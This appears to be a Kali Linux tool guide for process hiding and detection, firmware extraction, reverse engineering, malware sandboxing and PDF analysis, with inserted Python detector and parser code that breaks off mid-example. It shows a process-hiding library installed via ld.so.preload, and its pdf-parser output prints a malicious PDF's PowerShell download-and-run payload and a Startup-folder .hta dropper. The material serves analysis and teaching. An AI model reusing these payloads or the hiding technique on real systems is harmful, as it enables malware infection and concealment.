root@kali:~# mv libprocesshider.so /usr/local/lib
root@kali:~# echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
# ncat is running but does not appear in the process list
root@kali:~# ncat -l
root@kali:~# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 4796 3972 pts/0 Ss 02:38 0:00 bash
root 2602 0.0 0.0 5572 3400 pts/1 R+ 11:45 0:00 ps aux
# Show the hidden process
root@kali:~# unhide sys
[*]Searching for Hidden processes through getpriority() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through getpgid() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through getsid() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through sched_getaffinity() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through sched_getparam() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through sched_getscheduler() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through sched_rr_get_interval() scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through kill(..,0) scanning
Found HIDDEN PID: 2460
Cmdline: "ncat"
Executable: "/usr/bin/ncat"
Command: "ncat"
$USER=<undefined>
$PWD=/root
[*]Searching for Hidden processes through comparison of results of system calls
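The brute-force technique unhide applies above (probe every PID with a signal-free syscall and compare against what a /proc listing shows) can be written as a small detector of its own. This is an added example and not unhide's code; it assumes Linux with /proc mounted, and the `exists`/`relist` parameters are hypothetical hooks so the comparison logic can be tested with injected data.

```python
import os

PROC = "/proc"


def visible_pids(proc=PROC):
    """Collect every PID that a directory listing of /proc reveals (what ps sees).

    Thread IDs from /proc/<pid>/task are included on purpose: kill(tid, 0)
    succeeds for a thread as well, and a thread is not a hidden process.
    An LD_PRELOAD hider such as libprocesshider filters exactly this readdir.
    """
    ids = set()
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        ids.add(int(name))
        try:
            ids.update(int(t) for t in os.listdir(f"{proc}/{name}/task") if t.isdigit())
        except OSError:
            pass  # the process exited between the two listings
    return ids


def pid_exists(pid):
    """Probe a PID without touching it: kill(pid, 0) delivers no signal.

    ESRCH means the kernel knows no such PID; EPERM means it exists but is
    owned by someone else, which for our purpose still counts as "exists".
    """
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True
    return True


def find_hidden_pids(visible, max_pid, exists=pid_exists, relist=visible_pids):
    """Return PIDs that answer the syscall probe but are missing from the listing.

    visible  - set obtained from the directory listing
    max_pid  - upper bound of the brute-force range (kernel.pid_max)
    exists   - probe function (injectable hook for testing)
    relist   - re-reads the listing so that a process which merely started
               after the first listing is not reported (the race unhide also handles)
    """
    candidates = [pid for pid in range(1, max_pid + 1)
                  if pid not in visible and exists(pid)]
    if not candidates:
        return []
    fresh = relist()
    return [pid for pid in candidates if pid not in fresh and exists(pid)]


def read_pid_max(path="/proc/sys/kernel/pid_max"):
    with open(path) as fh:
        return int(fh.read())


def scan(max_pid=None):
    """Scan the live system; returns the list of hidden PIDs.

    Caveat: with /proc mounted hidepid=1/2, other users' processes are absent
    from the listing but still answer EPERM, so run this as root.
    """
    if max_pid is None:
        max_pid = read_pid_max()
    return find_hidden_pids(visible_pids(), max_pid)


if __name__ == "__main__":
    for pid in scan():
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmd = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            cmd = "<unreadable>"
        print(f"Found HIDDEN PID: {pid}  cmdline: {cmd!r}")
```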
Malware Analysis and Reverse Engineering
Binwalk
Analyzes binary images and extracts the files they contain.
■ Usage
root@kali:~# binwalk --help
Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...
Signature Scan Options:
-B, --signature Scan target file(s) for common file signatures
-R, --raw=<str> Scan target file(s) for the specified sequence of bytes
-A, --opcodes Scan target file(s) for common executable opcode signatures
-m, --magic=<file> Specify a custom magic file to use
-b, --dumb Disable smart signature keywords
-I, --invalid Show results marked as invalid
-x, --exclude=<str> Exclude results that match <str>
-y, --include=<str> Only show results that match <str>
Extraction Options:
-e, --extract Automatically extract known file types
-D, --dd=<type[:ext[:cmd]]> Extract <type> signatures (regular expression), give the files an extension of <ext>, and execute <cmd>
-M, --matryoshka Recursively scan extracted files
-d, --depth=<int> Limit matryoshka recursion depth (default: 8 levels deep)
-C, --directory=<str> Extract files/folders to a custom directory (default: current working directory)
-j, --size=<int> Limit the size of each extracted file
-n, --count=<int> Limit the number of extracted files
-0, --run-as=<str> Execute external extraction utilities with the specified user's privileges
-1, --preserve-symlinks Do not sanitize extracted symlinks that point outside the extraction directory (dangerous)
-r, --rm Delete carved files after extraction
-z, --carve Carve data from files, but don't execute extraction utilities
-V, --subdirs Extract into sub-directories named by the offset
Entropy Options:
-E, --entropy Calculate file entropy
-F, --fast Use faster, but less detailed, entropy analysis
-J, --save Save plot as a PNG
-Q, --nlegend Omit the legend from the entropy plot graph
-N, --nplot Do not generate an entropy plot graph
-H, --high=<float> Set the rising edge entropy trigger threshold (default: 0.95)
-L, --low=<float> Set the falling edge entropy trigger threshold (default: 0.85)
Binary Diffing Options:
-W, --hexdump Perform a hexdump / diff of a file or files
-G, --green Only show lines containing bytes that are the same among all files
-i, --red Only show lines containing bytes that are different among all files
-U, --blue Only show lines containing bytes that are different among some files
-u, --similar Only display lines that are the same between all files
-w, --terse Diff all files, but only display a hex dump of the first file
Raw Compression Options:
-X, --deflate Scan for raw deflate compression streams
-Z, --lzma Scan for raw LZMA compression streams
-P, --partial Perform a superficial, but faster, scan
-S, --stop Stop after the first result
General Options:
-l, --length=<int> Number of bytes to scan
-o, --offset=<int> Start scan at this file offset
-O, --base=<int> Add a base address to all printed offsets
-K, --block=<int> Set file block size
-g, --swap=<int> Reverse every n bytes before scanning
-f, --log=<file> Log results to file
-c, --csv Log results to file in CSV format
-t, --term Format output to fit the terminal window
-q, --quiet Suppress output to stdout
-v, --verbose Enable verbose output
-h, --help Show help output
-a, --finclude=<str> Only scan files whose names match this regex
-p, --fexclude=<str> Do not scan files whose names match this regex
-s, --status=<int> Enable the status server on the specified port
■ Example
# Look for file signatures that appear in the binary data and display the results
root@kali:~# binwalk --signature --term c7v5_2022-07-15_17.44.43.bin
DECIMAL HEXADECIMAL DESCRIPTION
------------------------------------------------------------------------------------------------------------------------------------------------
21876 0x5574 U-Boot version string, "U-Boot 1.1.4-gd4bfd123-dirty (Jul 14 2022 - 23:57:56)"
21940 0x55B4 CRC32 polynomial table, big endian
23232 0x5AC0 uImage header, header size: 64 bytes, header CRC: 0xA1469C27, created: 2022-07-15 03:57:57, image size: 41170
bytes, Data Address: 0x80010000, Entry Point: 0x80010000, data CRC: 0xB2EA616D, OS: Linux, CPU: MIPS, image
type: Firmware Image, compression type: lzma, image name: "u-boot image"
23296 0x5B00 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 97476 bytes
65038 0xFE0E XML document, version: "1.0"
78785 0x133C1 uImage header, header size: 64 bytes, header CRC: 0xB741C427, created: 2022-07-15 04:04:07, image size: 1088720
bytes, Data Address: 0x80060000, Entry Point: 0x80060000, data CRC: 0x53BA779B, OS: Linux, CPU: MIPS, image
type: Multi-File Image, compression type: lzma, image name: "MIPS OpenWrt Linux-3.3.8"
78857 0x13409 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 3164228 bytes
1167570 0x11D0D2 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 14547308 bytes, 2603 inodes, blocksize:
65536 bytes, created: 2022-07-15 09:17:42
15714887 0xEFCA47 gzip compressed data, from Unix, last modified: 2022-07-15 09:18:19
# Using the information obtained, extract the kernel image and check the environment the kernel was built with
root@kali:~# dd if=c7v5_2022-07-15_17.44.43.bin of=uImage bs=1 skip=78785 count=1088792
1088792+0 records in
1088792+0 records out
1088792 bytes (1.1 MB, 1.0 MiB) copied, 2.20989 s, 493 kB/s
root@kali:~# dd if=uImage of=Image.lzma bs=1 skip=72
1088720+0 records in
1088720+0 records out
1088720 bytes (1.1 MB, 1.0 MiB) copied, 2.20171 s, 494 kB/s
root@kali:~# unlzma -d < Image.lzma > Image
root@kali:~# strings Image | grep "Linux version"
Linux version 3.3.8 (gcc version 4.6.3 20120201 (prerelease) (Linaro GCC 4.6-2012.02) ) #1 Fri Jul 15 00:03:58 EDT 2022
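The two dd offsets above (78785 for the header, then 72 more bytes to reach the LZMA data) follow directly from the uImage format. The added example below, which is not binwalk's code, parses a uImage header, verifies both CRCs, and computes where each payload starts; for a Multi-File Image the data begins with a big-endian table of sub-image sizes terminated by 0, so with one sub-image the payload sits at 64 + 8 = 72 bytes. `build_uimage` constructs a test fixture and is not real firmware.

```python
import struct
import zlib

IH_MAGIC = 0x27051956
IH_MAGIC_BYTES = struct.pack(">I", IH_MAGIC)
IH_HDR_FMT = ">IIIIIIIBBBB32s"          # big-endian, 64 bytes
IH_HDR_SIZE = struct.calcsize(IH_HDR_FMT)
IH_TYPE_KERNEL, IH_TYPE_MULTI, IH_TYPE_FIRMWARE = 2, 4, 5
IH_COMP_LZMA = 3
IH_OS_LINUX, IH_ARCH_MIPS = 5, 5


def parse_uimage(blob, off=0):
    """Parse the uImage header at `off` and locate its payload image(s).

    Returns the header fields, whether header and data CRCs verify, and a
    list of (absolute_offset, size) for each payload image.
    """
    hdr = blob[off:off + IH_HDR_SIZE]
    if len(hdr) < IH_HDR_SIZE:
        raise ValueError("truncated header")
    (magic, hcrc, ctime, size, load, ep, dcrc,
     os_, arch, itype, comp, name) = struct.unpack(IH_HDR_FMT, hdr)
    if magic != IH_MAGIC:
        raise ValueError(f"bad magic 0x{magic:08x}")
    # The header CRC is computed with the hcrc field itself zeroed.
    header_ok = zlib.crc32(hdr[:4] + b"\0\0\0\0" + hdr[8:]) == hcrc
    data = blob[off + IH_HDR_SIZE:off + IH_HDR_SIZE + size]
    data_ok = len(data) == size and zlib.crc32(data) == dcrc

    images = []
    if itype == IH_TYPE_MULTI:
        sizes, pos = [], 0
        while True:                       # uint32 size table, 0-terminated
            chunk = data[pos:pos + 4]
            pos += 4
            if len(chunk) < 4 or chunk == b"\0\0\0\0":
                break
            sizes.append(struct.unpack(">I", chunk)[0])
        cursor = off + IH_HDR_SIZE + pos
        for n in sizes:
            images.append((cursor, n))
            cursor += (n + 3) & ~3        # each sub-image is padded to 4 bytes
    else:
        images.append((off + IH_HDR_SIZE, size))

    return {"name": name.rstrip(b"\0").decode(errors="replace"),
            "size": size, "load": load, "ep": ep, "os": os_, "arch": arch,
            "type": itype, "comp": comp, "ctime": ctime,
            "header_ok": header_ok, "data_ok": data_ok, "images": images}


def scan_uimage(blob):
    """Signature scan in the spirit of binwalk -B: report every offset whose
    64 bytes carry the magic *and* a valid header CRC (rules out chance hits)."""
    hits, pos = [], blob.find(IH_MAGIC_BYTES)
    while pos != -1:
        try:
            if parse_uimage(blob, pos)["header_ok"]:
                hits.append(pos)
        except ValueError:
            pass
        pos = blob.find(IH_MAGIC_BYTES, pos + 1)
    return hits


def build_uimage(sub_images, name, itype, comp=IH_COMP_LZMA,
                 load=0x80060000, ep=0x80060000):
    """Build a uImage in memory (constructed test fixture, not real firmware)."""
    if itype == IH_TYPE_MULTI:
        table = b"".join(struct.pack(">I", len(s)) for s in sub_images) + b"\0\0\0\0"
        data = table + b"".join(s + b"\0" * (-len(s) % 4) for s in sub_images)
    else:
        data = sub_images[0]
    body = struct.pack(IH_HDR_FMT, IH_MAGIC, 0, 0, len(data), load, ep,
                       zlib.crc32(data), IH_OS_LINUX, IH_ARCH_MIPS, itype, comp,
                       name.encode().ljust(32, b"\0"))
    return body[:4] + struct.pack(">I", zlib.crc32(body)) + body[8:] + data
```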
edb
A GUI debugger for static/dynamic analysis of binary code.
■ Usage
root@kali:~# edb --help
Usage: edb [OPTIONS]
--attach <pid> : attach to running process
--run <program> (args...) : execute specified <program> with <args>
--stdin <filename> : set the STDIN of the target process (MUST preceded --run)
--stdout <filename> : set the STDOUT of the target process (MUST preceded --run)
--version : output version information and exit
--dump-version : display terse version string and exit
--help : display this help and exit
BinaryInfoPlugin::BinaryInfo
--symbols <filename> : generate symbols for <filename> and exit
■ Example
root@kali:~# edb --run /usr/bin/ssh
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Starting edb version: 1.3.0
[...]
Ghidra
A GUI tool for reverse engineering software. It can analyze compiled code for a variety of platforms including Windows, macOS and Linux.
■ Example
root@kali:~# ghidra
Download a malware binary from https://github.com/MalwareSamples/Linux-Malware-Samples and analyze it
main function
Calls the processCmd function.
processCmd function
Sends HTTP requests according to the given parameters.
SendHttpRand function, SendHTTP function
Sends suspicious HTTP requests (HTTP Request Smuggling?).
Sends suspicious HTTP requests (bypassing Cloudflare's CAPTCHA challenge?).
HexWalk
A hex editor/viewer/analyzer. It provides binary analysis, byte-map display, hash calculation, diff comparison and more.
■ Usage
root@kali:~# hexwalk --help-all
Usage: hexwalk [options] file
Options:
-h, --help Displays help on commandline options.
--help-all Displays help including Qt specific
options.
--qmljsdebugger <value> Activates the QML/JS debugger with a
specified port. The value must be of
format port:1234[,block]. "block" makes
the application wait for a connection.
--platform <platformName[:options]> QPA plugin. See QGuiApplication
documentation for available options for
each plugin.
--platformpluginpath <path> Path to the platform plugins.
--platformtheme <theme> Platform theme.
--plugin <plugin> Additional plugins to load, can be
specified multiple times.
--qwindowgeometry <geometry> Window geometry for the main window,
using the X11-syntax, like 100x100+50+50.
--qwindowicon <icon> Default window icon.
--qwindowtitle <title> Title of the first window.
--reverse Sets the application's layout direction
to Qt::RightToLeft (debugging helper).
--session <session> Restores the application from an earlier
session.
■ Example
root@kali:~# hexwalk c7v5_us.bin
Run Binwalk from within the editor for analysis
ImHex
A multi-purpose hex editor for viewing, decoding, reverse engineering, extracting information from and patching values in binary data. It has the following features:
- Custom pattern-matching and analysis scripting language
- Visual node-based data preprocessor
- Disassembler
- YARA rule execution and visualization
- Bookmarks
- Binary data diffing
■ Example
Run YARA rules against a malware sample; the locations matched by the rules are highlighted
INetSim
Provides dummy HTTP, FTP and other servers for observing the behavior of malware in a sandbox environment for malware analysis.
[Provided services]
- HTTP / HTTPS
- SMTP / SMTPS
- POP3 / POP3S
- DNS
- FTP / FTPS
- TFTP
- IRC
- NTP
- Ident
- Finger
- Syslog
- Daytime / Time / Echo / Chargen / Discard / Quotd / Dummy
■ Usage
root@kali:~# inetsim --help
Usage: /usr/bin/inetsim [options]
Available options:
--help Print this help message.
--version Show version information.
--config=<filename> Configuration file to use.
--log-dir=<directory> Directory logfiles are written to.
--data-dir=<directory> Directory containing service data.
--report-dir=<directory> Directory reports are written to.
--bind-address=<IP address> Default IP address to bind services to.
Overrides configuration option 'default_bind_address'.
--max-childs=<num> Default maximum number of child processes per service.
Overrides configuration option 'default_max_childs'.
--user=<username> Default user to run services.
Overrides configuration option 'default_run_as_user'.
--faketime-init-delta=<secs> Initial faketime delta (seconds).
Overrides configuration option 'faketime_init_delta'.
--faketime-auto-delay=<secs> Delay for auto incrementing faketime (seconds).
Overrides configuration option 'faketime_auto_delay'.
--faketime-auto-incr=<secs> Delta for auto incrementing faketime (seconds).
Overrides configuration option 'faketime_auto_increment'.
--session=<id> Session id to use. Defaults to main process id.
--pidfile=<filename> Pid file to use. Defaults to '/var/run/inetsim.pid'.
■ Example
root@kali:~# inetsim
INetSim 1.3.2 (2020-05-19) by Matthias Eckert & Thomas Hungenberg
Using log directory: /var/log/inetsim/
Using data directory: /var/lib/inetsim/
Using report directory: /var/log/inetsim/report/
Using configuration file: /etc/inetsim/inetsim.conf
Parsing configuration file.
Configuration file parsed successfully.
=== INetSim main process started (PID 2776) ===
Session ID: 2776
Listening on: 127.0.0.1
Real Date/Time: 2024-10-17 04:00:32
Fake Date/Time: 2024-10-17 04:00:32 (Delta: 0 seconds)
Forking services...
* dns_53_tcp_udp - started (PID 2778)
deprecated method; prefer start_server() at /usr/share/perl5/INetSim/DNS.pm line 69.
Attempt to start Net::DNS::Nameserver in a subprocess at /usr/share/perl5/INetSim/DNS.pm line 69.
* irc_6667_tcp - started (PID 2788)
* smtp_25_tcp - started (PID 2781)
* ident_113_tcp - started (PID 2791)
* discard_9_tcp - started (PID 2799)
* discard_9_udp - started (PID 2800)
* chargen_19_udp - started (PID 2804)
* http_80_tcp - started (PID 2779)
* smtps_465_tcp - started (PID 2782)
* ntp_123_udp - started (PID 2789)
* dummy_1_tcp - started (PID 2805)
* pop3s_995_tcp - started (PID 2784)
[...]
Simulation running.
# INetSim's DNS service fails with an error, so start a separate DNS proxy
root@kali:~# dnschef --fakeip 127.0.0.1 --fakeipv6 2001:db8::1
# Sending an HTTP request connects to INetSim's dummy HTTP server
root@kali:~# curl http://example.com
<html>
<head>
<title>INetSim default HTML page</title>
</head>
<body>
<p></p>
<p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
<p align="center">This file is an HTML document.</p>
</body>
</html>
# An FTP connection goes to INetSim's dummy FTP server
root@kali:~# ftp example.com
ftp: Trying 127.0.0.1 ...
Connected to example.com.
220 INetSim FTP Service ready.
Name (example.com:root): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
-rw-rw-rw- 1 1067 1067 28 Oct 17 03:02 sample.txt
226 Transfer complete.
ftp> bye
221 Goodbye.
jadx
A Java decompiler that handles .apk/.dex/.jar/.class and similar files.
■ Usage
root@kali:~# jadx --help
usage: jadx [command] [options] <input files> (.apk, .dex, .jar, .class, .smali, .zip, .aar, .arsc, .aab, .xapk, .jadx.kts)
commands (use '<command> --help' for command options):
plugins - manage jadx plugins
options:
-d, --output-dir - output directory
-ds, --output-dir-src - output directory for sources
-dr, --output-dir-res - output directory for resources
-r, --no-res - do not decode resources
-s, --no-src - do not decompile source code
--single-class - decompile a single class, full name, raw or alias
--single-class-output - file or dir for write if decompile a single class
--output-format - can be 'java' or 'json', default: java
-e, --export-gradle - save as android gradle project
-j, --threads-count - processing threads count, default: 4
-m, --decompilation-mode - code output mode:
'auto' - trying best options (default)
'restructure' - restore code structure (normal java code)
'simple' - simplified instructions (linear, with goto's)
'fallback' - raw instructions without modifications
--show-bad-code - show inconsistent code (incorrectly decompiled)
--no-xml-pretty-print - do not prettify XML
--no-imports - disable use of imports, always write entire package name
--no-debug-info - disable debug info parsing and processing
--add-debug-lines - add comments with debug line numbers if available
--no-inline-anonymous - disable anonymous classes inline
--no-inline-methods - disable methods inline
--no-move-inner-classes - disable move inner classes into parent
--no-inline-kotlin-lambda - disable inline for Kotlin lambdas
--no-finally - don't extract finally block
--no-replace-consts - don't replace constant value with matching constant field
--escape-unicode - escape non latin characters in strings (with \u)
--respect-bytecode-access-modifiers - don't change original access modifiers
--mappings-path - deobfuscation mappings file or directory. Allowed formats: Tiny and Tiny v2 (both '.tiny'), Enigma (.mapping) or Enigma directory
--mappings-mode - set mode for handling the deobfuscation mapping file:
'read' - just read, user can always save manually (default)
'read-and-autosave-every-change' - read and autosave after every change
'read-and-autosave-before-closing' - read and autosave before exiting the app or closing the project
'ignore' - don't read or save (can be used to skip loading mapping files referenced in the project file)
--deobf - activate deobfuscation
--deobf-min - min length of name, renamed if shorter, default: 3
--deobf-max - max length of name, renamed if longer, default: 64
--deobf-whitelist - space separated list of classes (full name) and packages (ends with '.*') to exclude from deobfuscation, default: android.support.v4.* android.support.v7.* android.support.v4.os.* android.support.annotation.Px androidx.core.os.* androidx.annotation.Px
--deobf-cfg-file - deobfuscation mappings file used for JADX auto-generated names (in the JOBF file format), default: same dir and name as input file with '.jobf' extension
--deobf-cfg-file-mode - set mode for handling the JADX auto-generated names' deobfuscation map file:
'read' - read if found, don't save (default)
'read-or-save' - read if found, save otherwise (don't overwrite)
'overwrite' - don't read, always save
'ignore' - don't read and don't save
--deobf-use-sourcename - use source file name as class name alias
--deobf-res-name-source - better name source for resources:
'auto' - automatically select best name (default)
'resources' - use resources names
'code' - use R class fields names
--use-kotlin-methods-for-var-names - use kotlin intrinsic methods to rename variables, values: disable, apply, apply-and-hide, default: apply
--rename-flags - fix options (comma-separated list of):
'case' - fix case sensitivity issues (according to --fs-case-sensitive option),
'valid' - rename java identifiers to make them valid,
'printable' - remove non-printable chars from identifiers,
or single 'none' - to disable all renames
or single 'all' - to enable all (default)
--integer-format - how integers are displayed:
'auto' - automatically select (default)
'decimal' - use decimal
'hexadecimal' - use hexadecimal
--fs-case-sensitive - treat filesystem as case sensitive, false by default
--cfg - save methods control flow graph to dot file
--raw-cfg - save methods control flow graph (use raw instructions)
-f, --fallback - set '--decompilation-mode' to 'fallback' (deprecated)
--use-dx - use dx/d8 to convert java bytecode
--comments-level - set code comments level, values: error, warn, info, debug, user-only, none, default: info
--log-level - set log level, values: quiet, progress, error, warn, info, debug, default: progress
-v, --verbose - verbose output (set --log-level to DEBUG)
-q, --quiet - turn off output (set --log-level to QUIET)
--version - print jadx version
-h, --help - print this help
■ Example
root@kali:~# jadx -d /root/out /root/mastodon-githubRelease.apk
INFO - loading ...
INFO - processing ...
INFO - done
root@kali:~# tree out/sources/
out/sources/
├── a
│ ├── a.java
│ └── b.java
├── a0
│ └── a.java
├── a1
│ ├── b.java
│ ├── c.java
│ └── d.java
├── a2
│ ├── a.java
│ ├── b.java
│ └── c.java
├── android
│ └── util
│ └── FloatProperty.java
├── androidx
│ ├── annotation
│ │ └── Keep.java
│ ├── recyclerview
│ │ └── widget
│ │ ├── RecyclerView.java
[...]
It can also be operated through a GUI.
pdf-parser
Parses PDF files and identifies their basic elements, such as the objects they use.
■ Usage
root@kali:~# pdf-parser --help
Usage: pdf-parser.py [options] pdf-file|zip-file|url
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-m, --man Print manual
-s SEARCH, --search=SEARCH
string to search in indirect objects (except streams)
-f, --filter pass stream object through filters (FlateDecode,
ASCIIHexDecode, ASCII85Decode, LZWDecode and
RunLengthDecode only)
-o OBJECT, --object=OBJECT
id(s) of indirect object(s) to select, use comma (,)
to separate ids (version independent)
-r REFERENCE, --reference=REFERENCE
id of indirect object being referenced (version
independent)
-e ELEMENTS, --elements=ELEMENTS
type of elements to select (cxtsi)
-w, --raw raw output for data and filters
-a, --stats display stats for pdf document
-t TYPE, --type=TYPE type of indirect object to select
-O, --objstm parse stream of /ObjStm objects
-v, --verbose display malformed PDF elements
-x EXTRACT, --extract=EXTRACT
filename to extract malformed content to
-H, --hash display hash of objects
-n, --nocanonicalizedoutput
do not canonicalize the output
-d DUMP, --dump=DUMP filename to dump stream content to
-D, --debug display debug info
-c, --content display the content for objects without streams or
with streams without filters
--searchstream=SEARCHSTREAM
string to search in streams
--unfiltered search in unfiltered streams
--casesensitive case sensitive search in streams
--regex use regex to search in streams
--overridingfilters=OVERRIDINGFILTERS
override filters with given filters (use raw for the
raw stream content)
-g, --generate generate a Python program that creates the parsed PDF
file
--generateembedded=GENERATEEMBEDDED
generate a Python program that embeds the selected
indirect object as a file
-y YARA, --yara=YARA YARA rule (or directory or @file) to check streams
(can be used with option --unfiltered)
--yarastrings Print YARA strings
--decoders=DECODERS decoders to load (separate decoders with a comma , ;
@file supported)
--decoderoptions=DECODEROPTIONS
options for the decoder
-k KEY, --key=KEY key to search in dictionaries
-j, --jsonoutput produce json output
■ Example
root@kali:~# pdf-parser evil.pdf --stats
Comment: 4
XREF: 0
Trailer: 0
StartXref: 1
Indirect object: 23
Indirect objects with a stream: 6, 7, 8, 9, 10, 13, 14, 15, 18, 21, 25, 27, 29, 30, 31, 32, 19
15: 6, 7, 8, 9, 10, 13, 14, 15, 20, 24, 25, 29, 30, 31, 32
/CMap 1: 27
/Catalog 1: 1
/Font 2: 22, 26
/FontDescriptor 1: 23
/Metadata 1: 21
/ObjStm 1: 18
/XRef 1: 19
Unreferenced indirect objects: 6 0 R, 7 0 R, 8 0 R, 9 0 R, 10 0 R, 13 0 R, 14 0 R, 15 0 R, 18 0 R, 19 0 R, 26 0 R, 30 0 R, 31 0 R
Unreferenced indirect objects without /ObjStm objects: 6 0 R, 7 0 R, 8 0 R, 9 0 R, 10 0 R, 13 0 R, 14 0 R, 15 0 R, 19 0 R, 26 0 R, 30 0 R, 31 0 R
Search keywords:
/AcroForm 1: 1
# Search for objects whose stream contains the text "<script"
root@kali:~# pdf-parser evil.pdf --searchstream "<script" --filter
obj 7 0
Type:
Referencing:
Contains stream
<<
/Filter /FlateDecode
/Length 616
>>
b'<config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf><fontInfo><embed>1</embed></fontInfo><version>1.65</version><creator>Syncfusion</creator><producer>Syncfusion</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><encryption><permissions><accessibleContent>1</accessibleContent><contentCopy>1</contentCopy><documentAssembly>1</documentAssembly><formFieldFilling>1</formFieldFilling><modifyAnnots>1</modifyAnnots><print>1</print><printHighQuality>1</printHighQuality><change>1</change><plaintextMetadata>1</plaintextMetadata></permissions></encryption><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression><linearized>1</linearized><script language="jscript">var c = \'powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri \\\\"ttps://brazilanimalshelp.com/updating/stale.exe\\\\" -OutFile \\\\"$env:APPDATA\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\SecurityUpdate.exe\\\\"; Start-Process -FilePath \\\\"$env:APPDATA\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\SecurityUpdate.exe\\\\""\'; new ActiveXObject(\'WScript.Shell\').Run(c);</script></pdf></present><acrobat><acrobat7><dynamicRender>required</dynamicRender></acrobat7></acrobat></config>'
obj 8 0
Type:
Referencing:
Contains stream
<<
/Filter /FlateDecode
/Length 408
>>
b'<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/"><subform name="form1" locale="en_US" layout="tb"><pageSet><pageArea name="Page1"><contentArea x="0pt" y="0pt" w="595pt" h="842pt" /><medium short="595pt" long="842pt" /></pageArea></pageSet><subform name="subform1" layout="tb" w="595pt"><event activity="docReady" ref="$host" name="event__docReady"><script contentType="application/x-javascript">timeout = app.setTimeOut("event.target.exportXFAData({cPath: \\"/c/users/\\" + identity.loginName + \\"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/officeupdate.hta\\"});", 500);</script></event><margin /></subform></subform></template>'
PDFiD
Performs a quick analysis of which elements a PDF file is made of.
■ Usage
root@kali:~# pdfid --help
Usage: pdfid [options] [pdf-file|zip-file|url|@file] ...
Arguments:
pdf-file and zip-file can be a single file, several files, and/or @file
@file: run PDFiD on each file listed in the text file specified
wildcards are supported
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-s, --scan scan the given directory
-a, --all display all the names
-e, --extra display extra data, like dates
-f, --force force the scan of the file, even without proper %PDF
header
-d, --disarm disable JavaScript and auto launch
-p PLUGINS, --plugins=PLUGINS
plugins to load (separate plugins with a comma , ;
@file supported)
-c, --csv output csv data when using plugins
-m MINIMUMSCORE, --minimumscore=MINIMUMSCORE
minimum score for plugin results output
-v, --verbose verbose (will also raise catched exceptions)
-S SELECT, --select=SELECT
selection expression
-n, --nozero supress output for counts equal to zero
-o OUTPUT, --output=OUTPUT
output to log file
--pluginoptions=PLUGINOPTIONS
options for the plugin
-l, --literalfilenames
take filenames literally, no wildcard matching
--recursedir Recurse directories (wildcards and here files (@...)
allowed)
■ Example
root@kali:~# pdfid evil.pdf
PDFiD 0.2.8 evil.pdf
PDF Header: %PDF-1.5
obj 23
endobj 23
stream 18
endstream 17
xref 0
trailer 0
startxref 1
/Page 0
/Encrypt 0
/ObjStm 1
/JS 0
/JavaScript 0
/AA 0
/OpenAction 0
/AcroForm 1
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0
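Note the contrast between the two runs on evil.pdf: PDFiD reports /JS 0 and /JavaScript 0 because it counts names in the raw bytes, while pdf-parser --searchstream --filter found the script only after inflating a FlateDecode stream. The added example below (not code from either tool) implements both views side by side: a PDFiD-style keyword count over the raw file and a stream search that decompresses FlateDecode before matching. `build_sample_pdf` constructs a small sample with a placeholder script, not the real payload.

```python
import re
import zlib

# Names PDFiD counts; a zero here says nothing about content inside compressed streams.
PDFID_KEYWORDS = [b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/AcroForm",
                  b"/Launch", b"/EmbeddedFile", b"/XFA", b"/ObjStm"]

# "N G obj << dict >> stream ... endstream". The dictionary match is single-level:
# a dictionary nested with << >> inside needs a real tokenizer (pdf-parser has one).
OBJ_RE = re.compile(
    rb"(\d+)\s+(\d+)\s+obj\s*(<<(?:(?!>>).)*>>)\s*stream\r?\n(.*?)\r?\nendstream", re.S)
NAME_END = rb"(?![A-Za-z0-9_])"   # so that /JS does not also count /JSX


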